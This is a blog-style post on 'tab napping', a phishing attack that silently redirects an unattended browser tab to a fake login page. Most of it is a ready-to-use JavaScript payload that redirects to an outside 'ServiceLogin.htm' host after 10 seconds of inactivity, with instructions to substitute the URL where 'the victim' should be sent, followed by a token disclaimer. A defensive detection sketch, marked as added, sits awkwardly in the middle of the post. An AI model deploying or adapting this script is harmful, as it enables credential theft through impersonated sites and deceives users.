Tab Napping: A New Phishing Attack



Traditional phishing attacks are reasonably easy to avoid: just don’t click links in suspicious e-mails (or, for the really
paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack by
hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change
the tab favicon and title before loading a new site, say a fake version of Gmail or Orkut, in the background.
Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them.
Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As
Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is
malleable and moldable and the user will most likely simply think they left [the] tab open."
The only clue that you’re being tricked is that the URL will be wrong.
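The focus-loss behaviour described above suggests a defensive check: snapshot a tab's origin, title and favicon when it loses focus, then compare when the user returns. The following is an added example, not code from the original post; the event shape and the names `TabWatch` and `runSampleTrace` are assumptions made for illustration.

```javascript
// Added sketch of a tab-identity check, the kind of logic a browser extension could run.
// The event shape {type, url, title, favicon} is an assumption for this example.
function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; } // unparsable URL
}

class TabWatch {
  constructor() {
    this.current = null;  // latest observed {url, title, favicon}
    this.snapshot = null; // state captured when the tab lost focus
  }

  // Feed one event; returns an array of warnings (empty when nothing looks off).
  handle(ev) {
    if (ev.type === 'state') {
      this.current = { url: ev.url, title: ev.title, favicon: ev.favicon };
      return [];
    }
    if (ev.type === 'blur') { this.snapshot = this.current; return []; }
    if (ev.type !== 'focus' || !this.snapshot || !this.current) return [];
    const before = this.snapshot, after = this.current;
    this.snapshot = null;
    const o1 = originOf(before.url), o2 = originOf(after.url);
    if (o1 === null || o2 === null || o1 !== o2) {
      // The URL is the one cue that remains, so report both origins explicitly.
      return [{ level: 'high', reason: 'origin-changed-while-unfocused', from: o1, to: o2 }];
    }
    if (before.title !== after.title && before.favicon !== after.favicon) {
      // A title change alone is normal (unread counts); title plus favicon is unusual.
      return [{ level: 'medium', reason: 'title-and-favicon-changed' }];
    }
    return [];
  }
}

// Constructed event trace: the user leaves a blog tab and it navigates while unfocused.
function runSampleTrace() {
  const w = new TabWatch();
  const events = [
    { type: 'state', url: 'https://blog.example.test/post', title: 'A post', favicon: 'blog.ico' },
    { type: 'blur' },
    { type: 'state', url: 'https://login.example.invalid/ServiceLogin', title: 'Sign in', favicon: 'mail.ico' },
    { type: 'focus' },
  ];
  return events.flatMap((ev) => w.handle(ev));
}
```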
The script used is shown below:
<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

function initRedirect() {
    if (typeof document.body.scrollTop != "undefined") { // IE, NS7, Moz
        xScroll = document.body.scrollLeft;
        yScroll = document.body.scrollTop;
        clearInterval(timerPoll);     // stop polling scroll move
        clearInterval(timerRedirect); // stop timed redirect

        timerPoll = setInterval("pollActivity()", 1); // poll scrolling
        timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'", 10000); // set timed redirect
    }
    else if (typeof window.pageYOffset != "undefined") { // other browsers that support pageYOffset/pageXOffset instead
        xScroll = window.pageXOffset;
        yScroll = window.pageYOffset;
        clearInterval(timerPoll);     // stop polling scroll move
        clearInterval(timerRedirect); // stop timed redirect
        timerPoll = setInterval("pollActivity()", 1); // poll scrolling
        timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'", 10000); // set timed redirect
    }
    // else do nothing
}

function pollActivity() {
    if ((typeof document.body.scrollTop != "undefined" &&
         (xScroll != document.body.scrollLeft || yScroll != document.body.scrollTop)) // IE/NS7/Moz
        ||
        (typeof window.pageYOffset != "undefined" &&
         (xScroll != window.pageXOffset || yScroll != window.pageYOffset))) { // other browsers
        initRedirect(); // reset polling scroll position
    }
}

// Any user activity re-arms the 10-second redirect timer
document.onmousemove = initRedirect;
document.onclick = initRedirect;
document.onkeydown = initRedirect;
window.onload = initRedirect;
window.onresize = initRedirect;
</script>



Replace the URL highlighted here with the URL to which you want the victim to be redirected.
Use this script in a page, and the page will redirect after 10 seconds without mouse, keyboard, or scroll activity, which is what happens when the user is not on that tab.


“Do not use this hack trick in any criminal activities, and please do not destroy anyone's account;
this is for educational purposes only.”


